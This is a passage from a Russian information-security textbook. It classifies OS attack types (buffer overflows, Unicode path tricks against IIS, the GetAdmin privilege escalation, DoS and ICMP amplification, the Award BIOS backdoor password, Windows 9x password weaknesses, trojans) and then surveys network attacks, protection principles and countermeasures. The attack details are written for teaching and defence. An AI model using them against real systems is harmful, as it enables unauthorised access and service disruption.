Рис. 10. Соотношение групп атак для ОС семейства Windows
45%
40%
35%
30%
25%
20%
15%
10%
5%
0%
Первая Вторая Третья Четвертая Пятая Шестая Седьмая Восьмая
группа группа группа группа группа группа группа группа
(исполня- (чтения/ (″троянские
(РПД) (DOS) (закладки) (пароли) (прочие)
емый код) записи) программы″)
39% 2% 4% 24% 3% 7% 8% 13%
60
Рис. 11. Соотношение групп атак для ОС семейства UNIX
Угрозы, позволяющие несанкционированно запустить исполняемый

код
К данной группе относятся угрозы, которые основываются на пере-
полнении буфера для входных данных (переполнение стека) и последу-
ющей передачи управления на исполняемый код, занесенный при этом в
стек. Для переполнения стека используется тот факт, что часто при вы-
полнении функций работы со строками, переменными среды исполнения
и т.д., разработчики ПО не заботятся о проверке размерности входных
данных. А это приводит к выходу за границы массивов, выделенных для
работы с этими данными. В последнее время появилось целое направле-
ние системных средств по борьбе с угрозами данной группы (Pax,
StackGuard).
Одним из методов предотвращения подобных ошибок является
присвоение атрибута, исключающего исполнение кода страницам памя-
ти, выделенным под стек. Тем не менее, существуют возможности обхо-
да данного ограничения.
Большая часть примеров, реализующих эту группу угроз, рассчитаны
на ОС семейства UNIX. При этом переполнение буфера возможно в самых
разнообразных приложениях и системных утилитах. Наиболее часто оно
используется для удаленного запуска исполняемого кода, посредством об-
работчиков сетевых запросов и протоколов (ftp, telnet, рорЗ и др.).
Переполнение буфера можно использовать и в локальном контек-
сте, для того, чтобы увеличить свои привилегии или получить доступ на
уровне администратора системы (root).
Примерами реализации этой группы угроз являются следующие
программы:
♦ Zgvexploit.c ♦ Kmemthief.c ♦ Imapdexploit.c и др.
Для ОС семейства UNIX эта группа включает в себя наибольшее
количество опубликованных примеров для несанкционированного до-
ступа к системе (более 30%).
Для ОС семейства MS Windows применение угроз данной группы
также возможно, но в основном это приводит только к сбоям прикладно-
го или системного уровня, которые отнесены к другой группе. Заметим,
что общее число примеров, использующих переполнения буфера для це-
лей отличных от вывода системы из строя, не превышает 10%.
61
Угрозы, позволяющие осуществить несанкционированные операции
чтения/записи
Ко второй группе можно отнести угрозы, основывающиеся на не-
правильной интерпретации прикладными и системными программами
входных параметров. В результате они дают доступ к объектам, не пере-
численным в списках санкционированного доступа.
Неправильная интерпретация входных параметров связана с некор-
ректной программной реализацией их обработки. Это происходит пото-
му, что программы, обрабатывающие данные запросы, являются либо
системными утилитами, либо прикладными программами, запущенными
в контексте безопасности системы. Поэтому они имеют непосредствен-
ный доступ к любым файловым (и другим) объектам, и могут предоста-
вить этот доступ пользователями, не обладающими достаточными пра-
вами для непосредственной работы с этими объектами.
Наибольшее распространение получили реализации данных методов
для ОС семейства MS Windows. В основном ошибки встречаются в стан-
дартных включенных в состав операционных систем Internet/Intranet-
приложениях, которые включены в состав ОС, таких как IIS (Internet
Information Server), почтовые клиенты (MS Mail, Exchange) и др.
Достаточно большое количество ошибок данного рода можно
встретить в системных утилитах, реализующих взаимодействие по сете-
вым протоколам прикладного уровня (NETBIOS и др.).
Например, ошибка в IIS заключается в следующем. IIS, обрабаты-
вая запросы в формате UNICODE, может неправильно интерпретировать
символы ‘\’, ‘/’ и т.п. (%c0%af, %cl%9c и т.п.), что приводит в дальней-
шем к генерации некорректных команд (недоступных в нормальной си-
туации) и получению несанкционированного доступа к объектам.
Большое количество ошибок встречается в реализации Java-
аплетов, VB-скриптов и т.д. в браузерах фирм Microsoft и Netscape. Че-
рез них с помощью соответствующих аплетов можно получить несанк-
ционированный доступ к файловым объекта. А поскольку обе фирмы
выпускают свои браузеры не только для ОС семейства MS Windows, но
и для ОС семейства UNIX, то ошибки в большинстве случаев дублиру-
ются в версиях ПО для разных платформ. Здесь же стоит отметить, что
проблема аплетов относится собственно не к языку Java, а к его реализа-
ции, например, Microsoft Java VM.
62
Угрозы, позволяющие обойти установленные разграничения прав
доступа
К третьей группе угроз можно отнести примеры, основывающиеся
на недоработках (ошибках) в ядре и системных утилитах ОС, позволя-
ющих программными методами обходить установленные разграничения
доступа к объектам системы.
Примеры ошибок, составляющих эту группу, немногочисленны, т.к.
требуют детального анализа работы механизмов (функций API) ОС и
соответствующей квалификации нарушителя. При этом нужно учиты-
вать, что при рассмотрении коммерческих ОС (не имеющих общедо-
ступных исходных текстов) данный анализ сильно затруднен, поскольку
производители, по понятным причинам, крайне неохотно документиру-
ют внутреннюю архитектуру систем.
В качестве примера для данной группы можно привести известную
программу "GetAdmin", реализующую получение администраторских
прав, используя некорректную работу функции NTAddAtom, позволяю-
щую записывать значения в любую область адресного пространства.
В системе Windows NT есть некий глобальный флаг NtGlobalFlag,
имеющий адрес примерно 0х801ХХХХХ. Изменением одного из битов
этого флага существует возможность превратить Windows NT в
Windows NT Checked Build. В результате право "SeDebugPrivilege" не
будет необходимо для внедрения в системные процессы. Далее, внедряя
свой исполняемый код (для чего нужна была привилегия
"SeDebugPrivilege") в системные процессы, можно обойти любые огра-
ничения, связанные с политикой безопасности (в данном случае созда-
вался пользователь с администраторскими правами).
Угрозы, приводящие к отказу в обслуживании (Denial of Service —
системный сбой)
К этой группе можно отнести угрозы, приводящие к отказу в об-
служивании (системный сбой). Большую часть этой группы составляют
примеры, основанные на недостаточной надежности реализации стека
сетевых протоколов ОС. Сбои в работе ОС достигаются посылкой групп
пакетов с некорректными заголовками, параметрами и т.п.
Примерами подобных программ служат:
teardrop jolt/jolt2 lornuke
winnuke winfreez win95ping и др.
Другую часть этой группы составляют угрозы, не использующие
напрямую (или совсем не использующие) детали реализации стека сете-
63
вых протоколов конкретной ОС. Они провоцируют отказ в обслуживании
путем чрезмерной загрузки канала. Простейшим примером может слу-
жить посылка большого количества пакетов из источника, обладающего
более скоростным каналом, приемнику, обладающему менее скоростным
каналом. Таким образом, полностью исчерпывается ресурс приемника,
приводя к его полному или частичному отказу в обслуживания.
Более сложным примером является так называемый флудер-
множитель. При отправке на удаленный хост сообщения, состоящего из
20-и байт IP-заголовка, в поле Protocol которого содержится значение 00
(что соответствует IPPROTORAW), удаленная система (или ближайший
к провоцируемой системе маршрутизатор), получив такое сообщение,
ответит сообщением ICMP-Destination Unreachable-Protocol Unreachable,
длиной от 68 до 84 байт. Очевидно, что, заменяя Source Address на адрес
атакуемого, провоцируется поток с коэффициентом умножения 4 (если
рассчитывать динамическое сжатие, то много больше).
Следует отметить, что программы, представляющие данную груп-
пу, не нарушают напрямую безопасность атакуемой системы, а просто
выводят ее из строя. Но можно представить себе пример более сложных
атак, где угрозами, приводящими к отказу от обслуживания, можно
устранять, например, реально действующие в системе узлы, а затем от
их имени получать несанкционированный доступ к защищенным дан-
ным.
Угрозы, использующие встроенные недокументированные возмож-
ности (закладки)
К пятой группе можно отнести методы, использующие встроенные
недокументированные возможности (закладки). К таким закладкам от-
носятся:
 встроенные инженерные пароли для входа в систему;
 специальные возможности (последовательность действий) для
недокументированных действий (например, в одном из хранителей
экрана фирмы Microsoft присутствует сетевой код);
 закладки в разнообразных прикладных приложениях и т.п.
Примером использования встроенного инженерного пароля может
служить широко известный пароль фирмы Award "AWARDSW", позво-
ляющий получить весь спектр прав для работы с BIOS.
64
Угрозы, использующие недостатки системы хранения или выбора
(недостаточная длина) данных об аутентификации (пароли)
К шестой группе можно отнести угрозы, использующие недостатки
системы хранения или выбора (недостаточная длина) данных об аутен-
тификации (пароли) и позволяющие путем реверсирования, подбора или
полного перебора всех вариантов получить эти данные. Эти программы
основываются на недостатках алгоритмов кодирования (хеширования)
паролей на защищаемые ресурсы или на вход в ОС.
Примером может служить реализация защиты разделяемых ресур-
сов в Windows 9Х, где при разграничении доступа на уровне ресурса (по
паролю), пароль для доступа хранится в реестре
(HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\
<ИMЯ КАТАЛОГА>, в ключе ParmlEnc), зашифрованный с помощью
алгоритма, который легко поддается расшифровке, поэтому легко полу-
чить исходный пароль.
Также неудачен сам алгоритм аутентификации в Windows 9Х через
NETBIOS. Если клиент посылает вместо полного пароля открытым тек-
стом только его первый символ (байт), то при совпадении этого символа
пароль считается правильным.
Следует отметить, что существует большое количество программ
(не только для ОС семейства MS Windows), предназначенных для пере-
бора паролей по различным алгоритмам, учитывающим слабость реали-
зации систем аутентификации и выбора паролей. К таким программам
относятся: L0phtcrack; pwlhack; pwlview; John the Ripper и др.
"Троянские" программы
Это программы, которые прописываются в автозагрузку ОС или
подменяют собой системные компоненты (утилиты) ОС и выполняют
несанкционированные действия. Для того, чтобы такая программа по-
явилась в системе, пользователь должен сам (преднамеренно, либо нет)
первоначально выполнить ее.
Обычно "троянские" программы распространяются под видом по-
лезных утилит (в том числе они могут присутствовать и в некоммерче-
ских средствах добавочной защиты информации), посылаются по почте в
виде присоединяемых замаскированных исполняемых файлов, скриптов,
устанавливаются злоумышленником на защищаемом компьютере вруч-
ную и т.п. После первого запуска программа заменяет собой часть си-
стемных файлов или просто добавляет себя в список загрузки и предо-
ставляет нарушителю доступ к системе или защищаемым ресурсам. При-
65
мером подменяющей программы может служить динамическая библиоте-
ка клиента Novell NetWare для ОС Windows NT "FPNWCLNT.DLL", пе-
рехватывающая и хранящая передаваемые пароли в открытом виде. Дру-
гие программы из этой группы: BackOrifice; Net Bus; Priority и др.
Прочие угрозы
К последней группе отнесем все остальные угрозы и программные
реализации, влияющие на функционирование и безопасность автомати-
зированной системы. В частности, большую часть угроз данной группы
составляют всевозможные программы-сниферы, позволяющие в пассив-
ном режиме "прослушивать" каналы ввода/вывода, передачи и обработ-
ки данных. Например, сюда можно отнести сниферы клавиатуры — про-
граммы, устанавливаемые злоумышленником на защищаемый объект, с
целью "прослушивания" канала ввода пароля (пароль с клавиатуры вво-
дится в открытом виде, соответственно, в открытом виде снимается
снифером). Отдельно отметим сниферы канала — программы, устанав-
ливаемые на какой-либо компьютер в ЛВС и "прослушивающие" весь
трафик в канале (особенно это критично для ЛВС, не реализующих фи-
зической сегментации канала связи).
Из приведенного анализа можно сделать следующий важный вы-
вод: угрозы, описанные в большинстве групп, напрямую использу-
ют различные недостатки ОС и системных приложений и позволя-
ют при полностью сконфигурированных и работающих встроенных
в ОС механизмах защиты осуществлять НСД, что подтверждает
необходимость усиления встроенных механизмов защиты.
Кроме того, анализируя представленную статистику угроз, можно
сделать вывод, что большая их часть связана именно с недостатками
средств защиты ОС, отмеченными выше, т.е. недостатками, связанными с
невыполнением (полным, либо частичным) формализованных требований
к защите, среди которых, в первую очередь, могут быть выделены:
 Некорректная реализация механизма управления доступом, прежде
всего при разграничении доступа к защищаемым объектам систем-
ных процессов и пользователей, имеющих права администратора.
 Отсутствие обеспечения замкнутости (целостности) программной
среды. Как мы видим, большинство атак осуществлялось либо с
использованием некоторых прикладных программ, либо с приме-
нением встроенных в виртуальные машины средств программиро-
вания. То есть, возможность большинства атак напрямую связана с
возможностью запуска злоумышленником соответствующей про-
66
граммы. При этом запуск может быть осуществлен как явно, так и
скрыто, в рамках возможностей встроенных в приложения интер-
претаторов команд.
Далее, можно сделать еще один вывод: проведенный анализ из-
вестных угроз современным универсальным ОС полностью под-
тверждает, что большая их часть обусловлена именно реализуемым
в ОС концептуальным подходом, состоящим в реализации схемы
распределенного администрирования механизмов защиты [28]. В
рамках этой схемы пользователь рассматривается как доверенное лицо,
являющееся элементом схемы администрирования и имеющее возмож-
ность назначать/изменять правила разграничения доступа. При этом он
не воспринимается как потенциальный злоумышленник, который может
сознательно или несознательно осуществить НСД к информации. Отсю-
да можем сделать и вывод об основном назначении механизмов доба-
вочной защиты ОС — реализация централизованной схемы администри-
рования механизмов защиты, в рамках которой будет осуществляться
противодействие НСД пользователя к информации.
1.9.3. Атаки на уровне сетевого программного обеспечения
Сетевое программное обеспечение является наиболее уязвимым,

потому что канал связи, по которому передаются сообщения, чаще всего
не защищен, и всякий, кто может иметь доступ к этому каналу, соответ-
ственно, может перехватывать сообщения и отправлять свои собствен-
ные. Поэтому на уровне СПО возможны следующие хакерские атаки:
 прослушивание сегмента локальной сети (в пределах одного и то-
го же сегмента локальной сети любой подключенный к нему ком-
пьютер в состоянии принимать сообщения, адресованные другим
компьютерам сегмента, а следовательно, если компьютер хакера
подсоединен к некоторому сегменту локальной сети, то ему стано-
вится доступен весь информационный обмен между компьютера-
ми этого сегмента);
 перехват сообщений на маршрутизаторе (если хакер имеет приви-
легированный доступ к сетевому маршрутизатору, то он получает
возможность перехватывать все сообщения, проходящие через
этот маршрутизатор, и хотя тотальный перехват невозможен из-за
слишком большого объема, чрезвычайно привлекательным для ха-
кера является выборочный перехват сообщений, содержащих па-
роли пользователей и их электронную почту);
67
 создание ложного маршрутизатора (путем отправки в сеть сооб-
щений специального вида хакер добивается, чтобы его компьютер
стал маршрутизатором сети, после чего получает доступ ко всем
проходящим через него сообщениям);
 навязывание сообщений (отправляя в сеть сообщения с ложным
обратным сетевым адресом, хакер переключает на свой компьютер
уже установленные сетевые соединения и в результате получает
права пользователей, чьи соединения обманным путем были пере-
ключены на компьютер хакера);
 отказ в обслуживании (хакер отправляет в сеть сообщения специ-
ального вида, после чего одна или несколько АС, подключенных к
сети, полностью или частично выходят из строя).
Поскольку атаки на уровне СПО спровоцированы открытостью се-
тевых соединений, разумно предположить, что для отражения этих атак
необходимо максимально защитить каналы связи и тем самым затруд-
нить обмен информацией по сети для тех, кто не является легальным
пользователем. Ниже перечислены некоторые способы такой защиты:
 максимальное ограничение размеров вычислительной сети (чем
больше сеть, тем труднее ее защитить);
 изоляция сети от внешнего мира (по возможности следует огра-
ничивать физический доступ к вычислительной сети извне, чтобы
уменьшить вероятность несанкционированного подключения ха-
кера);
 шифрование сетевых сообщений (тем самым можно устранить
угрозу перехвата сообщений, правда, за счет снижения производи-
тельности СПО и роста накладных расходов);
 электронная цифровая подпись сетевых сообщений (если все со-
общения, передаваемые по вычислительной сети, снабжаются
электронной цифровой подписью, и при этом неподписанные со-
общения игнорируются, то можно забыть про угрозу навязывания
сообщений и про большинство угроз, связанных с отказом в об-
служивании);
 использование межсетевых экранов (межсетевой экран является
вспомогательным средством защиты, применяемым только в том
случае, если вычислительную сеть нельзя изолировать, от других
сетей, поскольку межсетевой экран довольно часто не способен
отличить потенциально опасное сетевое сообщение от совершенно
безвредного, и в результате типичной является ситуация, когда
68
межсетевой экран не только не защищает сеть от хакерских атак,
но и даже препятствует ее нормальному функционированию).
Для построения системы информационной безопасности необходи-
мо четко представлять задачи, решаемые ею в процессе функционирова-
ния АС, и принципы ее построения.
69
2. ОСНОВЫ ПОСТРОЕНИЯ СИСТЕМ И МОДЕЛИ
ОБЕСПЕЧЕНИЯ ИНФОРМАЦИОННОЙ
БЕЗОПАСНОСТИ АС
2.1. Основные принципы построения систем защиты
АС
В процессе развития работ по защите информации формировались
общеметодологические принципы построения и функционирования
СЗИ. Соблюдение требований таких принципов в общем случае способ-
ствует повышению эффективности защиты. Сформированная к настоя-
щему времени система включает следующий перечень общеметодологи-
ческих принципов:
 системности,
 комплексности;
 непрерывности защиты;
 разумной достаточности;
 гибкости управления и применения:
 простоты применения защитных мер и средств.
Принцип системности
Системный подход к защите АС предполагает необходимость учета
всех взаимосвязанных, взаимодействующих и изменяющихся во време-
ни элементов, условий и факторов, важных для понимания и решения
проблемы обеспечения безопасности АС.
При создании системы защиты необходимо учитывать
все слабые, уязвимые места системы обработки информации;
характер, возможные объекты и направления атак на систему со
стороны нарушителей (особенно высококвалифицированных злоумыш-
ленников);
пути проникновения в распределенные системы и НСД к информа-
ции. Система защиты должна строиться с учетом не только всех извест-
ных каналов проникновения и НСД к информации, но и с учетом воз-
можности появления в будущем принципиально новых путей реализа-
ции угроз безопасности.
Принцип комплексности
В распоряжении специалистов по информационной безопасности
имеется большое количество мер, методов и средств защиты АС. Ком-
70
плексное их использование предполагает согласованное применение
разнородных средств при построении целостной системы защиты. Такая
система должна перекрывать все существенные каналы реализации
угроз и не содержать слабых мест на стыках отдельных ее компонентов.
Защита должна строиться эшелонировано (по уровням). Внешняя
защита должна обеспечиваться физическими средствами, организацион-
ными и правовыми мерами. Одной из наиболее укрепленных линий обо-
роны являются средства защиты, реализованные на уровне операцион-
ных систем, так как они управляют всеми ресурсами компьютерной си-
стемы. Прикладной уровень защиты, учитывающий особенности пред-
метной области, представляет внутренний рубеж обороны.
Принцип непрерывности защиты
Защита информации - это не разовое мероприятие и даже не опре-
деленная совокупность проведенных мероприятий и установленных
средств защиты. Это непрерывный целенаправленный процесс, предпо-
лагающий принятие соответствующих мер на всех этапах жизненного
цикла АС, начиная с самых ранних стадий проектирования. Разработка
системы защиты должна вестись параллельно с разработкой самой за-
щищаемой системы. Это позволит учесть требования безопасности при
проектировании архитектуры и, в конечном счете, позволит создать эф-
фективные (как по затратам ресурсов, так и по стойкости) защищенные
системы. Большинству физических и технических средств защиты для
эффективного выполнения своих функций необходима постоянная орга-
низационная (административная) поддержка (своевременная смена и
обеспечение правильного хранения и применения имен, паролей, клю-
чей шифрования, переопределение полномочий и т.п.). Перерывы в ра-
боте средств защиты могут быть использованы злоумышленниками для
анализа применяемых методов и средств защиты, для внедрения специ-
альных программных и аппаратных "закладок" и других средств преодо-
ления системы защиты.
Разумная достаточность
Создать абсолютно непреодолимую систему защиты принципиаль-
но невозможно. При достаточном количестве времени и средств можно
преодолеть любую защиту. Поэтому имеет смысл вести речь только о
некотором приемлемом уровне безопасности. Высокоэффективная си-
стема защиты стоит дорого, использует при работе существенную часть
мощности и ресурсов компьютерной системы и может создавать ощути-
мые дополнительные неудобства пользователям. Важно правильно вы-
71
брать тот достаточный уровень зашиты, при котором затраты, риск и
размер возможного ущерба были бы приемлемыми.
Гибкость системы защиты
Часто системы защиты создаются в условиях большой неопреде-
ленности. Поэтому принятые меры и установленные средства зашиты,
особенно в начальный период их эксплуатации, могут обеспечивать как
чрезмерный, так и недостаточный уровень защиты. Естественно, что для
обеспечения возможности изменения уровня защищенности средства
защиты должны обладать определенной гибкостью. Это свойство явля-
ется особенно важным, когда установку средств защиты необходимо
осуществлять на работающую систему, не нарушая процесса ее нор-
мального функционирования. Кроме того, условия внешней среды и
требования с течением времени меняются. В таких ситуациях свойство
гибкости спасает владельцев АС от необходимости принятия карди-
нальных мер по полной замене средств защиты на новые.
Принцип простоты применения средств защиты
Механизмы защиты должны быть интуитивно понятны и просты в
использовании. Применение средств защиты не должно быть связано со
знанием специальных языков или с выполнением действий, требующих
значительных дополнительных трудозатрат при обычной работе закон-
ных пользователей. Кроме этого от пользователя не должно требоваться
выполнение рутинных малопонятных ему операций (ввод нескольких
паролей и имен и т.д.).
2.2. Задачи системы защиты информации и меры их ре-

ализации
По результатам анализа возможных угроз АС можно сформулиро-
вать перечень основных задач, которые должны решаться системой за-
щиты информации [3]:
 управление доступом пользователей к ресурсам АС. Это необхо-
димо для защиты от неправомерного случайного или умышленно-
го вмешательства в работу системы и несанкционированного до-
ступа к ее информационным, программным и аппаратным ресур-
сам со стороны посторонних лиц, а также лиц из числа персонала
учреждения и пользователей;
 защита данных, передаваемых по каналам связи;
72
 регистрация, сбор, хранение, обработка и выдача сведений обо
всех событиях, происходящих в системе и имеющих отношение к
ее безопасности;
 контроль работы пользователей со стороны администрации и опе-
ративное оповещение администратора безопасности о попытках
несанкционированного доступа к ресурсам системы;
 контроль и поддержание целостности критичных ресурсов систе-
мы защиты и среды исполнения прикладных программ;
 защита от бесконтрольного внедрения в систему средств преодо-
ления защиты и потенциально опасных программ (в которых мо-
гут содержаться вредоносные закладки, компьютерные вирусы
или опасные ошибки);
 управление средствами системы защиты.
Меры противодействия угрозам безопасности
По способам осуществления все меры обеспечения безопасности
информационных систем подразделяются на:
 морально-этические;
 правовые (законодательные);
 организационные (административные);
 физические и технические (аппаратурные и программные).
К морально-этическим мерам противодействия относятся нормы
поведения, которые традиционно сложились или складываются по мере
распространения ЭВМ в стране или обществе. Эти нормы в основном не
являются обязательными, однако, их несоблюдение ведет обычно к па-
дению авторитета и престижа человека, группы лиц или учреждения.
Морально-этические нормы бывают неписаными (например, общепри-
знанные нормы честности, патриотизма и т.п.) и писаными, то есть
оформленные в некоторый свод (устав) правил или предписаний.
К правовым мерам защиты относятся действующие в стране зако-
ны, указы и нормативные акты. В них регламентируются правила обра-
щения с информацией, закрепляются права и обязанности участников
информационных отношений в процессе ее обработки и использования,
а также устанавливается ответственность за нарушения этих правил. Та-
ким образом, эти меры препятствуют неправомерному использованию
информации и являются сдерживающим фактором для потенциальных
нарушителей.
Законодательные и морально-этические меры защиты являются
универсальными в том смысле, что принципиально применимы для всех
каналов проникновения и НСД к АС и информации. В некоторых случа-
73
ях они являются единственно применимыми, как, например, при защите
открытой информации от незаконного тиражирования или при защите от
злоупотреблений служебным положением при работе с информацией.
Организационные (административные) меры защиты - это ме-
ры, которые регламентируют процессы функционирования системы об-
работки данных, использование ее ресурсов, деятельность персонала и
порядок взаимодействия пользователей с системой. Эти меры способ-
ствуют тому, чтобы в наибольшей степени затруднить или исключить
возможность реализации угроз безопасности. Они включают:
 мероприятия по разработке правил доступа пользователей к ре-
сурсам системы (разработка политики безопасности);
 подбор и подготовку персонала системы;
 организацию охраны и надежного пропускного режима;
 организацию учета, хранения, использования и уничтожения до-
кументов и носителей с информацией;
 распределение реквизитов разграничения доступа (паролей, клю-
чей шифрования и т. п.);
 организацию явного и скрытого контроля за работой пользовате-
лей.
Организационные меры - это единственное, что остается, когда дру-
гие методы и средства защиты отсутствуют или не могут обеспечить
требуемый уровень безопасности. Однако это вовсе не означает, что си-
стему защиты необходимо строить исключительно на их основе, как это
часто пытаются сделать чиновники, далекие от технического прогресса.
Этим мерам присущи серьезные недостатки, такие как:
 низкая надежность без соответствующей поддержки физическими,
техническими и программными средствами. Это объясняется тем,
что многие люди склонны к нарушению любых установленных
ограничений и правил, если возникают условия для нарушения;
 дополнительные неудобства, связанные с большим объемом ру-
тинной формальной работы (многочисленные правила и инструк-
ции надо писать, поддерживать их в актуальном состоянии и по-
стоянно следить за их выполнением).
Организационные меры необходимы для обеспечения эффективно-
го применения других мер и средств защиты в части, касающейся регла-
ментации действий людей. В то же время организационные меры необ-
ходимо поддерживать более надежными физическими и техническими
средствами.
Физические меры защиты основаны на применении различных ме-
74
ханических, электро- или электронно-механических устройств и соору-
жений. Они специально предназначены для создания физических пре-
пятствий на возможных путях проникновения и доступа потенциальных
нарушителей к компонентам системы и защищаемой информации. К
ним относятся также технические средства визуального наблюдения,
связи и охранной сигнализации.
Технические (аппаратно-программные) меры защиты основаны
на использовании различных электронных устройств и специальных
программ, входящих в состав АС и выполняющих (самостоятельно или в
комплексе с другими средствами) функции защиты такие как:
 идентификацию и аутентификацию пользователей;
 разграничение доступа к ресурсам;
 регистрацию событий;
 криптографическое закрытие информации и т.д.
Физические и технические средства защиты призваны устранить
недостатки организационных мер, поставить прочные барьеры на пути
злоумышленников и в максимальной степени исключить возможность
неумышленных ошибочных нарушений обслуживающего персонала и
пользователей системы.
Взаимосвязь рассмотренных выше мер обеспечения безопасности
приведена на рис. 12.
Рис. 12. Взаимосвязь мер обеспечения безопасности

Организационные меры обеспечивают исполнение нормативных
актов и строятся с учетом существующих морально-этических правил
поведения, принятых в стране и/или учреждении.
Воплощение организационных мер требует создания нормативных
документов.
75
Для эффективного применения организационные меры должны
быть поддержаны физическими и техническими средствами.
Применение и использование технических средств защиты требует
соответствующей организационной поддержки.
2.3. Методы и средства обеспечения информационной

Обеспечение информационной безопасности строится на совокуп-
ности методов, включающей в себя организационные, технические, про-
граммные составляющие.
На первом этапе развития концепций обеспечения безопасности
информации преимущество отдавалось программным средствам защи-
ты. По мере формирования системного подхода к проблеме обеспечения
безопасности информации, возникла необходимость комплексного при-
менения различных методов защиты и созданных на их основе средств и
механизмов защиты.
Поэтому, различают четыре основных группы методов обеспечения
информационной безопасности АС:
Организационные методы.
Инженерно-технические методы.
Технические методы.
Программно-аппаратные методы.
Организационные методы - ориентированы на работу с персоналом,
рассматривают выбор местоположения и размещения объектов ЗАС, ор-
ганизацию системы физической и пожарной безопасности, осуществле-
ние контроля, возложение персональной ответственности за выполнение
мер защиты, кадровые вопросы.
Инженерно-технические методы - связаны с построением инженер-
ных сооружений и коммуникаций, учитывающих требования безопасно-
сти. Это как правило дорогостоящие решения и они наиболее эффектив-
но реализуются на этапе строительства или реконструкции объекта. Их
реализация способствует повышению общей живучести АС и дают вы-
сокий эффект против некоторых типов угроз. Реализация техногенных и
стихийных угроз наиболее эффективно предотвращается инженерно-
техническими методами.
Технические методы - связаны с применением специальных техни-
ческих средств защиты информации и контроля обстановки; они дают
значительный эффект при устранении угроз, связанных с действиями
криминогенных элементов по добыванию информации незаконными
76
техническими средствами. Технические методы дают значительный эф-
фект по отношению к техногенным факторам, например резервирование
каналов и резервирование архивов данных.
Программно-аппаратные методы - направлены на устранение угроз,
непосредственно связанных с процессом обработки и передачи инфор-
мации. Без этих методов невозможно построить целостную комплекс-
ную защищенную АС.
Наибольший эффект дает оптимальное сочетание выше перечис-
ленных методов противодействия реализации угроз, информационной
безопасности.
Рассмотрим более подробно основные методы защиты информации
классифицируемые по характеру реализации
По характеру реализации методов обеспечения безопасности их
можно классифицировать следующим образом:
 управление;
 препятствия;
 маскировка;
 регламентация,
 побуждение;
 принуждение
Управление представляет собой регулирование использования
всех ресурсов системы в рамках установленного технологического цик-
ла обработки и передачи данных, где в качестве ресурсов рассматрива-
ются технические средства, ОС, программы, БД, элементы данных и т.п.
Управление защитой информации реализует процесс целенаправленного
воздействия подсистемы управления СОБД на средства и механизмы
защиты информации и компоненты АС с целью обеспечения безопасно-
сти данных.
Препятствия физически преграждают нарушителю путь к защи-
щаемым данным.
Маскировка представляет собой метод защиты информации пу-
тем их криптографического закрытия.
Регламентация заключается в разработке и реализации в процес-
се функционирования АС комплексов мероприятий, создающих такие
условия технологического цикла обработки данных, при которых мини-
мизируется риск НСД к данным. Регламентация охватывает как струк-
турное построение АС, так и технологию обработки данных, организа-
цию работы пользователей и персонала сети.
77
Побуждение состоит в создании такой обстановки и условий, при
которых правила обращения с защищенными данными регулируются
моральными и нравственными нормами.
Принуждение включает угрозу материальной, административной
и уголовной ответственности за нарушение правил обращения с защи-
щенными данными.
На основе перечисленных методов создаются средства обеспече-
ния информационной безопасности.
2.3.1. Формальные средства защиты
Формальными называются такие средства защиты, которые вы-

полняют свои функции по заранее установленным процедурам без вме-
шательства человека.
К формальным средствам защиты относятся технические и про-
граммные средства.
К техническим средствам защиты относятся все устройства, ко-
торые предназначены для защиты данных. В свою очередь, технические
средства защиты можно разделить на физические и аппаратные.
Физическими называются средства защиты, которые создают фи-
зические препятствия на пути к защищаемым данным и не входят в со-
став аппаратуры АС, а аппаратными - средства защиты данных, непо-
средственно входящие в состав аппаратуры АС.
Программными называются средства защиты данных, функцио-
нирующие в составе программного обеспечения АС.
Отдельную группу формальных средств составляют криптографи-
ческие средства, которые реализуются в виде программных, аппаратных
и программно-аппаратных средств защиты.
Классификация средств защиты данных с учетов методов реализа-
ция представлена на рис. 13.
78
Рис. 13. Классификация средств обеспечения информа-
ционной безопасности
Рассмотрим подробнее формальные средства обеспечения инфор-

мационной безопасности.
Физические средства защиты
Физические средства защиты выполняют следующие основные
функции:
1) охрана территории и зданий;
2) охрана внутренних помещений;
3) охрана оборудования и наблюдение за ним;
4) контроль доступа в защищаемые зоны;
5) нейтрализация излучений и наводок;
6) создание препятствий визуальному наблюдению и подслушива-
нию;
7) противопожарная защита;
8) блокировка действий нарушителя и т.п.
Для предотвращения проникновения нарушителей на охраняемые
объекты применяются следующие технические устройства:
- сверхвысокочастотные, ультразвуковые и инфракрасные систе-
мы;
79
- лазерные и оптические системы;
- телевизионные системы;
- кабельные системы;
- системы защиты окон и дверей.
Сверхвысокочастотные, ультразвуковые и инфракрасные систе-
мы предназначены для обнаружения движущихся объектов, определения
их размеров, скорости и направления перемещения. Принцип их дей-
ствия основан на изменении частоты отраженного от движущегося объ-
екта сигнала.
Инфракрасные системы бывают активными и пассивными. Актив-
ные системы содержат источник излучения и его приемник. Функцио-
нирование пассивных систем основано на фиксации теплового излуче-
ния ИК-датчиками.
Ультразвуковые и инфракрасные системы применяются, главным
образом, внутри помещений. СВЧ системы могут применяться как внут-
ри помещений, так и для охраны зданий и территории.
Лазерные и оптические системы, работающие в видимой части
спектра, реагируют на пересечение нарушителями светового луча и
применяются, в основном, внутри помещений.
Телевизионные системы применяются для наблюдения как за тер-
риторией охраняемого объекта, так и за обстановкой внутри помещений.
Кабельные системы используются для охраны небольших объек-
тов, обычно временно находящихся на территории, а также оборудова-
ния внутри помещений. Они состоят из заглубленного кабеля, окружа-
ющего защищаемый объект и излучающего радиоволны. Приемник из-
лучения реагирует на изменение поля, создаваемого нарушителем.
Системы защиты окон и дверей предназначены для препятствия
механическому проникновению, а также для защиты от наблюдения и
подслушивания.
Регулирование доступа на территорию и в помещения может осу-
ществляться и с помощью специальных замков, в том числе замков с
управлением от микропроцессоров и ЭВМ и с содержанием микропро-
цессоров.
Для защиты от перехвата электромагнитного излучения применя-
ются экранирование и зашумляющие генераторы излучений.
80
Организационные методы обеспечения информационной безопас-
ности.
Организационные методы обеспечения информационной безопас-
ности заключаются в разработке и реализации административных и ор-
ганизационно-технических мер при подготовке и эксплуатации системы.
Организационные меры, по мнению специалистов, не смотря на по-
стоянное совершенствование технических мер, составляют значитель-
ную часть (более 50%) от всех мер, реализуемых в системах защиты
информации. Они используются тогда, когда вычислительная система не
может непосредственно контролировать использование информации.
Кроме того, в некоторых ответственных случаях в целях повышения эф-
фективности защиты полезно иногда технические меры продублировать
организационными.
Организационные меры по защите информации в АС представляют
собой решения и процедуры, вырабатываемые руководством организа-
ции (предприятия, фирмы). Хотя некоторые из этих мер могут опреде-
ляться внешними факторами, например законами или правительствен-
ными постановлениями, большинство проблем решается внутри органи-
зации в конкретных условиях.
